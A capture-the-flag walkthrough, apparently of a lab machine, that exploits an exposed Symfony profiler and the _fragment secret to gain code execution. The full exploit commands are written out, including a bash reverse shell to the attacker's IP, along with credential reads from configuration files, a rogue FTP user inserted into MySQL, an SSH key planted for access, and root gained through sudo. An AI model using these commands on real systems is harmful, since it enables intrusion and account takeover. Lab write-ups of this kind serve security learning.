Target IP: 192.168.156.233
Challenge Description: A fractal is a way of seeing infinity.
There are three TCP ports open on the target machine, as shown above.
Performing an aggressive port scan against the open TCP ports returns the result above. There is an HTTP application on port 80, and I will start enumeration here. The scan above found the interesting robots.txt, which contains two entries: /app_dev.php and /app_dev.php/*.
Port 80: HTTP
The webpage above is displayed for this web application. At the bottom of the webpage, there is a comment Build with Symfony. I did not find anything else useful here.
Browsing to http://192.168.156.233/app_dev.php displays the webpage above. This page contains more information about the application & machine. The target machine seems to be running the application version 3.4.46 as shown above.
Pressing the application version button shows the application configuration above. Doing a Google search for public exploits led me to this article.
I managed to obtain the profiler token bba391 to access the Symfony Profiler.
The database default configuration file location is app/config/parameters.yml. Using the profiler, I managed to read the database configuration file shown above at http://192.168.156.233/app_dev.php/_profiler/open?file=app/config/parameters.yml. Now I have the credentials symfony:symfony_db_password. I also obtained the secret 48a8538e6260789558f0dfe29861c05b. Doing a Google search shows it is possible to obtain an RCE using this secret according to this article.
I found a working exploit for this application as shown above. This exploit seems to take advantage of the _fragment to execute commands. I downloaded the first exploit, secret_fragment_exploit.py, as shown above.
I ran the exploit with the command python exploit.py http://192.168.156.233/_fragment --internal-url http://192.168.156.233/_fragment --secret '48a8538e6260789558f0dfe29861c05b' --method 2 --function system --parameters 'id' to execute the command id.
This executed successfully, as the output of the id command is shown above. Maybe I can obtain a reverse shell now.
I started a listener on my machine at port 80. Then I used the command python exploit.py http://192.168.156.233/_fragment --internal-url http://192.168.156.233/_fragment --secret '48a8538e6260789558f0dfe29861c05b' --method 2 --function system --parameters "bash -c 'bash -i >& /dev/tcp/192.168.45.194/80 0>&1'" to obtain a reverse shell with the session as www-data. Now I have a foothold on the target machine.
I transferred LinPEAS to the target machine. After executing it, I obtained the useful information above. Using the phpMyAdmin credentials I obtained above, I gained access to the application. However, I did not find anything useful.
From previous enumeration, the FTP application is open. There is an interesting file called sql.conf at /etc/proftpd. This file contains the credentials proftpd:protfpd_with_MYSQL_password as shown above. I upgraded my shell using the command python3 -c 'import pty; pty.spawn("/bin/bash");'.
Running ss -ntplu shows there is another application running on port 33060. Is this another MySQL application?
I then used the command mysql -u proftpd -p'protfpd_with_MYSQL_password' -P 33060 to access the MySQL application. There is an interesting table called ftpuser, as shown above. Maybe I can create a user with shell access? In the table above, the password field starts with the string {md5}. Doing a Google search on how to create a password for ProFTPD gave me the command: echo "{md5}"`echo -n "letmein" | openssl dgst -binary -md5 | openssl enc -base64`. I used the new password letmein.
Using the SQL statement below, I inserted the benoit user with /bin/bash shell access:
INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (2, 'benoit', '{md5}DRB9CfW75Ayt495ccenptw==', '1000', '1000', '/', '/bin/bash', '0', NOW(), NOW());
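To show where the {md5} value in the statement above comes from, here is an added Python example (not part of the original writeup) that computes and verifies the ProFTPD mod_sql {md5} password format; the function names are my own.

```python
import base64
import hashlib
import hmac

# ProFTPD (mod_sql) stores "{md5}" passwords as base64(MD5(password)).
# There is no salt and no work factor, so two accounts with the same
# password get the same stored value and the digest is cheap to compute.
PREFIX = "{md5}"


def proftpd_md5(password: str) -> str:
    """Return the stored form ProFTPD expects for an {md5} password."""
    digest = hashlib.md5(password.encode("utf-8")).digest()
    return PREFIX + base64.b64encode(digest).decode("ascii")


def verify_proftpd_md5(stored: str, candidate: str) -> bool:
    """Check a candidate password against a stored {md5} value.

    Rejects values that are not in the {md5} scheme and uses a
    constant-time comparison so the check does not leak timing.
    """
    if not stored.startswith(PREFIX):
        raise ValueError("not a ProFTPD {md5} password value")
    return hmac.compare_digest(stored, proftpd_md5(candidate))


if __name__ == "__main__":
    # Reproduces the value used in the writeup's INSERT statement.
    print(proftpd_md5("letmein"))  # {md5}DRB9CfW75Ayt495ccenptw==
    print(verify_proftpd_md5("{md5}DRB9CfW75Ayt495ccenptw==", "letmein"))
```

The output matches the shell pipeline from the writeup (echo -n "letmein" | openssl dgst -binary -md5 | openssl enc -base64), which is the same unsalted MD5 digest base64-encoded.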
Now I can access the FTP using the credentials benoit:letmein. Since the SSH key is missing for this user, I generated an SSH key pair using the command ssh-keygen. Then I transferred the id_rsa.pub to .ssh as authorized_keys. Then, using the command ssh benoit@192.168.156.233 -i /home/kali/.ssh/id_rsa, I gained access to the SSH application as the user benoit. Now I have a foothold on the target machine as benoit. Running sudo -l shows all commands can be executed. Then gaining a root shell is as easy as entering sudo bash. GG.
The local.txt flag is shown above. This flag is located at the home directory of user benoit.
The proof.txt flag is shown above.